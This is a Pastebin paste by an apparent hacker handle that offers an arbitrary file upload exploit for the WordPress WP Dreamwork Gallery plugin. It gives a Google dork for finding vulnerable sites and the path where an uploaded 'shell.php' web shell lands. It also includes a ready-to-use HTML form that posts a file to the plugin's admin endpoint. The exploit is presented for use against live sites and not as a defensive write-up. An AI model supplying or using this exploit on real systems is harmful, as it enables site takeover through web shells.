Advertisement
zeeshan-haxor-zesn

Wordpress Dreamwork Gallery Arbitrary File Upload

Mar 15th, 2017
534
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. [+] Wordpress Arbitrary File Upload Vulnerability in WP Dreamwork Gallery
  2. [+] Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
  3. ./Zeeshan Haxor
  4. ./CyberTeamRox
  5. =======================================================================
  6. [+] Shell path:/wp-content/uploads/dreamwork/7_uploadfolder/big/shell.php
  7.  
  8. Exploit.php
  9. <html>
  10. <body>
  11. <form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
  12. <input type="hidden" name="task" value="drm_add_new_album" />
  13. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
  14. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
  15. <input type="file" name="album_img" value="" />
  16. <input type="submit" value="Submit" />
  17. </form>
  18. </body>
  19. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement